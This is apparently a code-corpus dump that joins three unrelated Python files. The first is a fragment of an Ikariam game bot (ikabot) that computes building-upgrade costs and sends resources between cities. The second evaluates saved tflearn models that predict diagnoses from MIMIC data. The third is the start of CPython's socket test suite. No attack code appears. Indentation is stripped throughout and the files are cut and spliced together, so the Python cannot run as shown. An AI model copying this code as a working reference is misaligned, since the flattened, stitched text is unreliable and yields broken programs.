building_detail_url = 'view=buildingDetail&buildingId=0&helpId=1&backgroundView=city&currentCityId={}&templateView=ikipedia&actionRequest={}&ajax=1'.format(city['id'], actionRequest)
building_detail_response = session.post(building_detail_url)
building_detail = json.loads(building_detail_response, strict=False)
building_html = building_detail[1][1][1]
# get html with information about buildings costs
regex_building_detail = r'<div class="(?:selected)? button_building ' + re.escape(building['building']) + r'"\s*onmouseover="\$\(this\)\.addClass\(\'hover\'\);" onmouseout="\$\(this\)\.removeClass\(\'hover\'\);"\s*onclick="ajaxHandlerCall\(\'\?(.*?)\'\);'
match = re.search(regex_building_detail, building_html)
building_costs_url = match.group(1)
building_costs_url += 'backgroundView=city&currentCityId={}&templateView=buildingDetail&actionRequest={}&ajax=1'.format(city['id'], actionRequest)
building_costs_response = session.post(building_costs_url)
building_costs = json.loads(building_costs_response, strict=False)
html_costs = building_costs[1][1][1]
# if the user has all the resource saving studies, we save that in the session data (one less request)
sessionData = session.getSessionData()
if 'reduccion_inv_max' in sessionData:
costs_reduction = 14
else:
# get the studies
url = 'view=noViewChange&researchType=economy&backgroundView=city&currentCityId={}&templateView=researchAdvisor&actionRequest={}&ajax=1'.format(city['id'], actionRequest)
rta = session.post(url)
rta = json.loads(rta, strict=False)
studies = rta[2][1]['new_js_params']
studies = json.loads(studies, strict=False)
studies = studies['currResearchType']
# look for resource saving studies
costs_reduction = 0
for study in studies:
if studies[study]['liClass'] != 'explored':
continue
link = studies[study]['aHref']
if '2020' in link:
costs_reduction += 2
elif '2060' in link:
costs_reduction += 4
elif '2100' in link:
costs_reduction += 8
# if the user has all the resource saving studies, save that in the session data
if costs_reduction == 14:
sessionData['reduccion_inv_max'] = True
session.setSessionData(sessionData)
# calculate cost reductions
costs_reduction /= 100
costs_reduction = 1 - costs_reduction
# get buildings that reduce the cost of upgrades
costs_reductions = getCostsReducers(city)
# get the type of resources that this upgrade will cost (wood, marble, etc)
resources_types = re.findall(r'<th class="costs"><img src="skin/resources/icon_(.*?)\.png"/></th>', html_costs)[:-1]
# get the actual cost of each upgrade
matches = re.findall(r'<td class="level">\d+</td>(?:\s+<td class="costs">.*?</td>)+', html_costs)
# calculate the cost of the entire upgrade, taking into account all the possible reductions
final_costs = [0] * len(materials_names)
levels_to_upgrade = 0
for match in matches:
lv = re.search(r'"level">(\d+)</td>', match).group(1)
lv = int(lv)
if lv <= current_level:
continue
if lv > final_level:
break
levels_to_upgrade += 1
# get the costs for the current level
costs = re.findall(r'<td class="costs">([\d,\.]*)</td>', match)
for i in range(len(costs)):
resource_type = resources_types[i]
for j in range(len(materials_names_tec)):
name = materials_names_tec[j]
if resource_type == name:
resource_index = j
break
# get the cost of the current resource type
cost = costs[i]
cost = cost.replace(',', '').replace('.', '')
cost = 0 if cost == '' else int(cost)
# calculate all the reductions
real_cost = Decimal(cost)
# investigation reduction
original_cost = Decimal(real_cost) / Decimal(costs_reduction)
# special building reduction
real_cost -= Decimal(original_cost) * (Decimal(costs_reductions[resource_index]) / Decimal(100))
final_costs[resource_index] += math.ceil(real_cost)
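# worked example (made-up numbers, assuming the listed cost already includes the
# research discount, as the division above implies): if the page lists 860 for a
# material and the research discount is 14% (costs_reduction == 0.86),
# original_cost is 1000; a level-10 reducer building then subtracts a further
# 10% of that (100), leaving a real cost of 760 added to final_costs.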
if levels_to_upgrade < final_level - current_level:
print(_('This building only allows you to expand {:d} more levels').format(levels_to_upgrade))
msg = _('Expand {:d} levels? [Y/n]:').format(levels_to_upgrade)
rta = read(msg=msg, values=['Y', 'y', 'N', 'n', ''])
if rta.lower() == 'n':
return [-1, -1, -1, -1, -1]
return final_costs
def sendResourcesNeeded(session, destination_city_id, city_origins, missing_resources):
"""
Parameters
----------
session : ikabot.web.session.Session
destination_city_id : int
city_origins : dict
missing_resources : list[int]
"""
info = _('\nTransport resources to upgrade building\n')
try:
routes = []
html = session.get(city_url + destination_city_id)
cityD = getCity(html)
for i in range(len(materials_names)):
missing = missing_resources[i]
if missing <= 0:
continue
# send the resources from each origin city
for cityOrigin in city_origins[i]:
if missing == 0:
break
available = cityOrigin['recursos'][i]
send = min(available, missing)
missing -= send
toSend = [0] * len(materials_names)
toSend[i] = send
route = (cityOrigin, cityD, cityD['islandId'], *toSend)
routes.append(route)
executeRoutes(session, routes)
except Exception as e:
msg = _('Error in:\n{}\nCause:\n{}').format(info, traceback.format_exc())
sendToBot(session, msg)
# no s.logout() because this is a thread, not a process
def chooseResourceProviders(session, cities_ids, cities, city_id, resource, missing):
"""
Parameters
----------
session : ikabot.web.session.Session
cities_ids : list[int]
cities : dict[int, dict]
city_id : int
resource : int
missing : int
"""
global sendResources
sendResources = True
global expand
expand = True
banner()
print(_('From what cities obtain {}?').format(materials_names[resource].lower()))
tradegood_initials = [material_name[0] for material_name in materials_names]
maxName = max([len(cities[city]['name']) for city in cities if cities[city]['id'] != city_id])
origin_cities = []
total_available = 0
for cityId in cities_ids:
if cityId == city_id:
continue
html = session.get(city_url + cityId)
city = getCity(html)
available = city['recursos'][resource]
if available == 0:
continue
        # ask the user if this city should provide resources
tradegood_initial = tradegood_initials[int(cities[cityId]['tradegood'])]
pad = ' ' * (maxName - len(cities[cityId]['name']))
msg = '{}{} ({}): {} [Y/n]:'.format(pad, cities[cityId]['name'], tradegood_initial, addThousandSeparator(available))
choice = read(msg=msg, values=['Y', 'y', 'N', 'n', ''])
if choice.lower() == 'n':
continue
        # if so, save the city and calculate the total amount of resources to send
total_available += available
origin_cities.append(city)
# if we have enough resources, return
if total_available >= missing:
return origin_cities
# if we reach this part, there are not enough resources to expand the building
print(_('\nThere are not enough resources.'))
if len(origin_cities) > 0:
print(_('\nSend the resources anyway? [Y/n]'))
choice = read(values=['y', 'Y', 'n', 'N', ''])
if choice.lower() == 'n':
sendResources = False
print(_('\nTry to expand the building anyway? [y/N]'))
choice = read(values=['y', 'Y', 'n', 'N', ''])
if choice.lower() == 'n' or choice == '':
expand = False
return origin_cities
def sendResourcesMenu(session, city_id, missing):
"""
Parameters
----------
session : ikabot.web.session.Session
city_id : int
    missing : list[int]
"""
global thread
cities_ids, cities = getIdsOfCities(session)
origins = {}
# for each missing resource, choose providers
for resource in range(len(missing)):
if missing[resource] <= 0:
continue
origin_cities = chooseResourceProviders(session, cities_ids, cities, city_id, resource, missing[resource])
if sendResources is False and expand:
print(_('\nThe building will be expanded if possible.'))
enter()
return
elif sendResources is False:
return
origins[resource] = origin_cities
if expand:
print(_('\nThe resources will be sent and the building will be expanded if possible.'))
else:
print(_('\nThe resources will be sent.'))
enter()
# create a new thread to send the resources
thread = threading.Thread(target=sendResourcesNeeded, args=(session, city_id, origins, missing,))
thread.start()
def getBuildingToExpand(session, cityId):
"""
Parameters
----------
session : ikabot.web.session.Session
cityId : int
Returns
-------
building : dict
"""
html = session.get(city_url + cityId)
city = getCity(html)
banner()
# show the buildings available to expand (ignore empty spaces)
print(_('Which building do you want to expand?\n'))
print(_('(0)\t\texit'))
buildings = [building for building in city['position'] if building['name'] != 'empty']
for i in range(len(buildings)):
building = buildings[i]
level = building['level']
if level < 10:
level = ' ' + str(level)
else:
level = str(level)
if building['isBusy']:
level = level + '+'
print(_('({:d})\tlv:{}\t{}').format(i+1, level, building['name']))
selected_building_id = read(min=0, max=len(buildings))
if selected_building_id == 0:
return None
building = buildings[selected_building_id - 1]
current_level = int(building['level'])
# if the building is being expanded, add 1 level
if building['isBusy']:
current_level += 1
banner()
print(_('building:{}').format(building['name']))
print(_('current level:{}').format(current_level))
final_level = read(min=current_level, msg=_('increase to level:'))
building['upgradeTo'] = final_level
return building
def constructionList(session, event, stdin_fd, predetermined_input):
"""
Parameters
----------
session : ikabot.web.session.Session
event : multiprocessing.Event
stdin_fd: int
predetermined_input : multiprocessing.managers.SyncManager.list
"""
sys.stdin = os.fdopen(stdin_fd)
config.predetermined_input = predetermined_input
try:
global expand
global sendResources
expand = True
sendResources = True
banner()
wait_resources = False
print(_('In which city do you want to expand a building?'))
city = chooseCity(session)
cityId = city['id']
building = getBuildingToExpand(session, cityId)
if building is None:
event.set()
return
current_level = building['level']
if building['isBusy']:
current_level += 1
final_level = building['upgradeTo']
# calculate the resources that are needed
resourcesNeeded = getResourcesNeeded(session, city, building, current_level, final_level)
if -1 in resourcesNeeded:
event.set()
return
print('\nMaterials needed:')
for i, name in enumerate(materials_names):
amount = resourcesNeeded[i]
if amount == 0:
continue
print('- {}: {}'.format(name, addThousandSeparator(amount)))
print('')
# calculate the resources that are missing
missing = [0] * len(materials_names)
for i in range(len(materials_names)):
if city['recursos'][i] < resourcesNeeded[i]:
missing[i] = resourcesNeeded[i] - city['recursos'][i]
# show missing resources to the user
if sum(missing) > 0:
print(_('\nMissing:'))
for i in range(len(materials_names)):
if missing[i] == 0:
continue
name = materials_names[i].lower()
print(_('{} of {}').format(addThousandSeparator(missing[i]), name))
print('')
# if the user wants, send the resources from the selected cities
print(_('Automatically transport resources? [Y/n]'))
rta = read(values=['y', 'Y', 'n', 'N', ''])
if rta.lower() == 'n':
print(_('Proceed anyway? [Y/n]'))
rta = read(values=['y', 'Y', 'n', 'N', ''])
if rta.lower() == 'n':
event.set()
return
else:
wait_resources = True
sendResourcesMenu(session, cityId, missing)
else:
print(_('\nYou have enough materials'))
print(_('Proceed? [Y/n]'))
rta = read(values=['y', 'Y', 'n', 'N', ''])
if rta.lower() == 'n':
event.set()
return
except KeyboardInterrupt:
event.set()
return
set_child_mode(session)
event.set()
info = _('\nUpgrade building\n')
info = info + _('City: {}\nBuilding: {}. From {:d}, to {:d}').format(city['cityName'], building['name'], current_level, final_level)
setInfoSignal(session, info)
try:
if expand:
expandBuilding(session, cityId, building, wait_resources)
elif thread:
thread.join()
except Exception as e:
msg = _('Error in:\n{}\nCause:\n{}').format(info, traceback.format_exc())
sendToBot(session, msg)
finally:
session.logout()
|
load_dense_fully_connected_1.py
|
"""Use an ANN to find the probability of occurrence of diseases"""
import tflearn
import numpy as np
import pandas as pd
import tensorflow as tf
from sklearn.cross_validation import train_test_split
from sklearn.metrics import accuracy_score, recall_score, f1_score, precision_score, \
confusion_matrix, roc_curve, auc, roc_auc_score
from sklearn.preprocessing import StandardScaler
from tflearn.data_utils import to_categorical
import os
import sys
import time
from multiprocessing import Process
lib_path = os.path.abspath(os.path.join('../', 'lib'))
sys.path.append(lib_path)
from icd9 import ICD9
# Start time
t1 = time.time()
# Parameters
diag_to_desc = {}
n_epoch = 5
batch_size = 32
size = 100 # Size of each sequence vector
window = 30 # Window for Word2Vec
name = 'Load_FC_n_epoch_' + str(n_epoch) + '_batch_size_' + str(batch_size) \
+ '_size_' + str(size) + '_window_' + str(window) + '_5645_' # name of ROC Plot
def generate_icd9_lookup():
"""Generate description from ICD9 code"""
tree = ICD9('../lib/icd9/codes.json')
for ud in uniq_diag:
try:
diag_to_desc[ud] = tree.find(ud[2:]).description
except:
if ud[2:] == "008":
diag_to_desc[ud] = "Intestinal infections due to other organisms"
elif ud[2:] == "280":
diag_to_desc[ud] = "Iron deficiency anemias"
elif ud[2:] == "284":
diag_to_desc[ud] = "Aplastic anemia and other bone marrow failure syndrome"
elif ud[2:] == "285":
diag_to_desc[ud] = "Other and unspecified anemias"
elif ud[2:] == "286":
diag_to_desc[ud] = "Coagulation defects"
elif ud[2:] == "287":
diag_to_desc[ud] = "Purpura and other hemorrhagic conditions"
elif ud[2:] == "288":
diag_to_desc[ud] = "Diseases of white blood cells"
else:
diag_to_desc[ud] = "Not Found"
# Load the data
df = pd.read_csv('../Data/mimic_diagnosis_word2vec/diagnosis_size_100_window_30_5645_pat.csv', header=None)
X = df.iloc[1:, 1:101].values
# Change later
# Convert label to categorical to train with tflearn
Y = {}
# Get the 80 most common diagnoses from the vocab file
with open('../Data/patient_sequences/vocab') as f:
uniq_diag = np.array(f.read().split('\n')[1].split(' '))
# Get the diagnosis results for each patient
for d, i in zip(uniq_diag, range(101, len(uniq_diag) + 101)):
Y[d] = df[i].values[1:]
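# A minimal sanity-check sketch (defined only, never called below) of the CSV
# layout assumed by the slicing above: column 0 is an identifier, columns
# 1-100 hold the word2vec features, and columns 101 onward hold one 0/1 label
# per diagnosis. The function name is illustrative only.
def _check_label_columns():
    assert X.shape[1] == size, "expected {} feature columns".format(size)
    for d in uniq_diag:
        values = set(np.unique(Y[d].astype(np.float32)))
        assert values <= {0.0, 1.0}, "non-binary labels for {}".format(d)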
model = {}
def model1():
for c, d in enumerate(uniq_diag[:20]):
# Display the training diagnosis
print("--------------------Training {}--------------------".format(d))
# Run each iteration in a graph
with tf.Graph().as_default():
y = Y[d].astype(np.float32)
y = y.reshape(-1, 1)
y = to_categorical(y, nb_classes=2) # Convert label to categorical to train with tflearn
# Train and test data
X_train, X_test, Y_train, Y_test = train_test_split(X, y, test_size=0.1, random_state=0)
# Standardize the data
sc = StandardScaler()
sc.fit(X_train)
X_test_sd = sc.transform(X_test)
# Model
input_layer = tflearn.input_data(shape=[None, 100], name='input')
dense1 = tflearn.fully_connected(input_layer, 128, activation='linear', name='dense1')
dropout1 = tflearn.dropout(dense1, 0.8)
dense2 = tflearn.fully_connected(dropout1, 128, activation='linear', name='dense2')
dropout2 = tflearn.dropout(dense2, 0.8)
output = tflearn.fully_connected(dropout2, 2, activation='softmax', name='output')
regression = tflearn.regression(output, optimizer='adam', loss='categorical_crossentropy',
learning_rate=.001)
# Define model with checkpoint (autosave)
model = tflearn.DNN(regression, tensorboard_verbose=3)
# load the previously trained model
model.load('Saved_Models/Fully_Connected/dense_fully_connected_dropout_5645_{}.tfl'.format(d))
# Find the probability of outputs
y_pred_prob = np.array(model.predict(X_test_sd))[:, 1]
# Find the predicted class
y_pred = np.where(y_pred_prob > 0.5, 1., 0.)
# Predicted class is the 2nd column in Y_test
Y_test_dia = Y_test[:, 1]
acc = accuracy_score(Y_test_dia, y_pred) * 100
errors = (y_pred != Y_test_dia).sum()
ps = precision_score(Y_test_dia, y_pred) * 100
rs = recall_score(Y_test_dia, y_pred) * 100
f1 = f1_score(Y_test_dia, y_pred) * 100
confmat = confusion_matrix(y_true=Y_test_dia, y_pred=y_pred)
print("Errors for %s : %.f" % (d, errors))
print("Accuracy for %s : %.2f%%" % (d, acc))
print("Precision for %s : %.2f%%" % (d, ps))
print("Recall for %s : %.2f%%" % (d, rs))
print("F1 Score for %s : %.2f%%" % (d, f1))
print("Confusion Matrix for %s :" % d)
print(confmat)
# Input to roc_curve must be Target scores, can either be
# probability estimates of the positive class, confidence values, or non-thresholded measure of decisions
roc_area = roc_auc_score(Y_test_dia, y_pred_prob)
print("ROC AUC for %s : %.2f" % (d, roc_area))
print('\n')
print('Completed : {0}/{1}'.format(c + 1, len(uniq_diag) / 4))
print('--------------------{} Complete--------------------'.format(d))
print('\n')
def model2():
for c, d in enumerate(uniq_diag[20:40]):
# Display the training diagnosis
print("--------------------Training {}--------------------".format(d))
# Run each iteration in a graph
with tf.Graph().as_default():
y = Y[d].astype(np.float32)
y = y.reshape(-1, 1)
y = to_categorical(y, nb_classes=2) # Convert label to categorical to train with tflearn
# Train and test data
X_train, X_test, Y_train, Y_test = train_test_split(X, y, test_size=0.1, random_state=0)
# Standardize the data
sc = StandardScaler()
sc.fit(X_train)
X_test_sd = sc.transform(X_test)
# Model
input_layer = tflearn.input_data(shape=[None, 100], name='input')
dense1 = tflearn.fully_connected(input_layer, 128, activation='linear', name='dense1')
dropout1 = tflearn.dropout(dense1, 0.8)
dense2 = tflearn.fully_connected(dropout1, 128, activation='linear', name='dense2')
dropout2 = tflearn.dropout(dense2, 0.8)
output = tflearn.fully_connected(dropout2, 2, activation='softmax', name='output')
regression = tflearn.regression(output, optimizer='adam', loss='categorical_crossentropy',
learning_rate=.001)
# Define model with checkpoint (autosave)
model = tflearn.DNN(regression, tensorboard_verbose=3)
# load the previously trained model
model.load('Saved_Models/Fully_Connected/dense_fully_connected_dropout_5645_{}.tfl'.format(d))
# Find the probability of outputs
y_pred_prob = np.array(model.predict(X_test_sd))[:, 1]
# Find the predicted class
y_pred = np.where(y_pred_prob > 0.5, 1., 0.)
# Predicted class is the 2nd column in Y_test
Y_test_dia = Y_test[:, 1]
acc = accuracy_score(Y_test_dia, y_pred) * 100
errors = (y_pred != Y_test_dia).sum()
ps = precision_score(Y_test_dia, y_pred) * 100
rs = recall_score(Y_test_dia, y_pred) * 100
f1 = f1_score(Y_test_dia, y_pred) * 100
confmat = confusion_matrix(y_true=Y_test_dia, y_pred=y_pred)
print("Errors for %s : %.f" % (d, errors))
print("Accuracy for %s : %.2f%%" % (d, acc))
print("Precision for %s : %.2f%%" % (d, ps))
print("Recall for %s : %.2f%%" % (d, rs))
print("F1 Score for %s : %.2f%%" % (d, f1))
print("Confusion Matrix for %s :" % d)
print(confmat)
# Input to roc_curve must be Target scores, can either be
# probability estimates of the positive class, confidence values, or non-thresholded measure of decisions
roc_area = roc_auc_score(Y_test_dia, y_pred_prob)
print("ROC AUC for %s : %.2f" % (d, roc_area))
print('\n')
print('Completed : {0}/{1}'.format(c + 1, len(uniq_diag) / 4))
print('--------------------{} Complete--------------------'.format(d))
print('\n')
def model3():
for c, d in enumerate(uniq_diag[40:60]):
# Display the training diagnosis
print("--------------------Training {}--------------------".format(d))
# Run each iteration in a graph
with tf.Graph().as_default():
y = Y[d].astype(np.float32)
y = y.reshape(-1, 1)
y = to_categorical(y, nb_classes=2) # Convert label to categorical to train with tflearn
# Train and test data
X_train, X_test, Y_train, Y_test = train_test_split(X, y, test_size=0.1, random_state=0)
# Standardize the data
sc = StandardScaler()
sc.fit(X_train)
X_test_sd = sc.transform(X_test)
# Model
input_layer = tflearn.input_data(shape=[None, 100], name='input')
dense1 = tflearn.fully_connected(input_layer, 128, activation='linear', name='dense1')
dropout1 = tflearn.dropout(dense1, 0.8)
dense2 = tflearn.fully_connected(dropout1, 128, activation='linear', name='dense2')
dropout2 = tflearn.dropout(dense2, 0.8)
output = tflearn.fully_connected(dropout2, 2, activation='softmax', name='output')
regression = tflearn.regression(output, optimizer='adam', loss='categorical_crossentropy',
learning_rate=.001)
# Define model with checkpoint (autosave)
model = tflearn.DNN(regression, tensorboard_verbose=3)
# load the previously trained model
model.load('Saved_Models/Fully_Connected/dense_fully_connected_dropout_5645_{}.tfl'.format(d))
# Find the probability of outputs
y_pred_prob = np.array(model.predict(X_test_sd))[:, 1]
# Find the predicted class
y_pred = np.where(y_pred_prob > 0.5, 1., 0.)
# Predicted class is the 2nd column in Y_test
Y_test_dia = Y_test[:, 1]
acc = accuracy_score(Y_test_dia, y_pred) * 100
errors = (y_pred != Y_test_dia).sum()
ps = precision_score(Y_test_dia, y_pred) * 100
rs = recall_score(Y_test_dia, y_pred) * 100
f1 = f1_score(Y_test_dia, y_pred) * 100
confmat = confusion_matrix(y_true=Y_test_dia, y_pred=y_pred)
print("Errors for %s : %.f" % (d, errors))
print("Accuracy for %s : %.2f%%" % (d, acc))
print("Precision for %s : %.2f%%" % (d, ps))
print("Recall for %s : %.2f%%" % (d, rs))
print("F1 Score for %s : %.2f%%" % (d, f1))
print("Confusion Matrix for %s :" % d)
print(confmat)
# Input to roc_curve must be Target scores, can either be
# probability estimates of the positive class, confidence values, or non-thresholded measure of decisions
roc_area = roc_auc_score(Y_test_dia, y_pred_prob)
print("ROC AUC for %s : %.2f" % (d, roc_area))
print('\n')
print('Completed : {0}/{1}'.format(c + 1, len(uniq_diag) / 4))
print('--------------------{} Complete--------------------'.format(d))
print('\n')
def model4():
for c, d in enumerate(uniq_diag[60:]):
# Display the training diagnosis
print("--------------------Training {}--------------------".format(d))
# Run each iteration in a graph
with tf.Graph().as_default():
y = Y[d].astype(np.float32)
y = y.reshape(-1, 1)
y = to_categorical(y, nb_classes=2) # Convert label to categorical to train with tflearn
# Train and test data
X_train, X_test, Y_train, Y_test = train_test_split(X, y, test_size=0.1, random_state=0)
# Standardize the data
sc = StandardScaler()
sc.fit(X_train)
X_test_sd = sc.transform(X_test)
# Model
input_layer = tflearn.input_data(shape=[None, 100], name='input')
dense1 = tflearn.fully_connected(input_layer, 128, activation='linear', name='dense1')
dropout1 = tflearn.dropout(dense1, 0.8)
dense2 = tflearn.fully_connected(dropout1, 128, activation='linear', name='dense2')
dropout2 = tflearn.dropout(dense2, 0.8)
output = tflearn.fully_connected(dropout2, 2, activation='softmax', name='output')
regression = tflearn.regression(output, optimizer='adam', loss='categorical_crossentropy',
learning_rate=.001)
# Define model with checkpoint (autosave)
model = tflearn.DNN(regression, tensorboard_verbose=3)
# load the previously trained model
model.load('Saved_Models/Fully_Connected/dense_fully_connected_dropout_5645_{}.tfl'.format(d))
# Find the probability of outputs
y_pred_prob = np.array(model.predict(X_test_sd))[:, 1]
# Find the predicted class
y_pred = np.where(y_pred_prob > 0.5, 1., 0.)
# Predicted class is the 2nd column in Y_test
Y_test_dia = Y_test[:, 1]
acc = accuracy_score(Y_test_dia, y_pred) * 100
errors = (y_pred != Y_test_dia).sum()
ps = precision_score(Y_test_dia, y_pred) * 100
rs = recall_score(Y_test_dia, y_pred) * 100
f1 = f1_score(Y_test_dia, y_pred) * 100
confmat = confusion_matrix(y_true=Y_test_dia, y_pred=y_pred)
print("Errors for %s : %.f" % (d, errors))
print("Accuracy for %s : %.2f%%" % (d, acc))
print("Precision for %s : %.2f%%" % (d, ps))
print("Recall for %s : %.2f%%" % (d, rs))
print("F1 Score for %s : %.2f%%" % (d, f1))
print("Confusion Matrix for %s :" % d)
print(confmat)
# Input to roc_curve must be Target scores, can either be
# probability estimates of the positive class, confidence values, or non-thresholded measure of decisions
roc_area = roc_auc_score(Y_test_dia, y_pred_prob)
print("ROC AUC for %s : %.2f" % (d, roc_area))
print('\n')
print('Completed : {0}/{1}'.format(c + 1, len(uniq_diag) / 4))
print('--------------------{} Complete--------------------'.format(d))
print('\n')
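# model1()-model4() above are identical except for the slice of uniq_diag they
# cover. Below is a minimal sketch (not wired into the __main__ block) of how
# the same load-and-score steps could be generated from one parameterized
# worker; make_worker() is an illustrative name, not part of the original script.
def make_worker(start, end):
    """Return a zero-argument process target evaluating uniq_diag[start:end]."""
    def worker():
        for c, d in enumerate(uniq_diag[start:end]):
            print("--------------------Evaluating {}--------------------".format(d))
            with tf.Graph().as_default():
                y = to_categorical(Y[d].astype(np.float32).reshape(-1, 1), nb_classes=2)
                X_train, X_test, Y_train, Y_test = train_test_split(X, y, test_size=0.1, random_state=0)
                sc = StandardScaler()
                sc.fit(X_train)
                X_test_sd = sc.transform(X_test)
                # Rebuild the network exactly as above and load the saved weights
                input_layer = tflearn.input_data(shape=[None, 100], name='input')
                dense1 = tflearn.fully_connected(input_layer, 128, activation='linear', name='dense1')
                dropout1 = tflearn.dropout(dense1, 0.8)
                dense2 = tflearn.fully_connected(dropout1, 128, activation='linear', name='dense2')
                dropout2 = tflearn.dropout(dense2, 0.8)
                output = tflearn.fully_connected(dropout2, 2, activation='softmax', name='output')
                regression = tflearn.regression(output, optimizer='adam', loss='categorical_crossentropy', learning_rate=.001)
                net = tflearn.DNN(regression, tensorboard_verbose=3)
                net.load('Saved_Models/Fully_Connected/dense_fully_connected_dropout_5645_{}.tfl'.format(d))
                y_pred_prob = np.array(net.predict(X_test_sd))[:, 1]
                print("ROC AUC for %s : %.2f" % (d, roc_auc_score(Y_test[:, 1], y_pred_prob)))
            print('Completed : {0}/{1}'.format(c + 1, end - start))
    return worker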
if __name__ == '__main__':
p1 = Process(target=model1)
p1.start()
p2 = Process(target=model2)
p2.start()
p3 = Process(target=model3)
p3.start()
p4 = Process(target=model4)
p4.start()
p1.join()
p2.join()
p3.join()
p4.join()
print("--------------------Training Done!!!--------------------")
# Calculate time
t2 = time.time()
print("Time Taken : {:.2f} s".format(t2 - t1))
|
test_socket.py
|
#!/usr/bin/env python3
import unittest
from test import support
from unittest.case import _ExpectedFailure
import errno
import io
import socket
import select
import tempfile
import _testcapi
import time
import traceback
import queue
import sys
import os
import array
import platform
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
try:
import fcntl
except ImportError:
fcntl = False
try:
import multiprocessing
except ImportError:
multiprocessing = False
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
try:
import _thread as thread
import threading
except ImportError:
thread = None
threading = None
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, socket.error, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_RDS = _have_socket_rds()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen(1)
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
if threading:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except socket.error:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
    tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
    connection and performing the accept() in setUp()).
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
self.clientSetUp()
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except _ExpectedFailure:
# We deliberately ignore expected failures
pass
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except socket.error:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
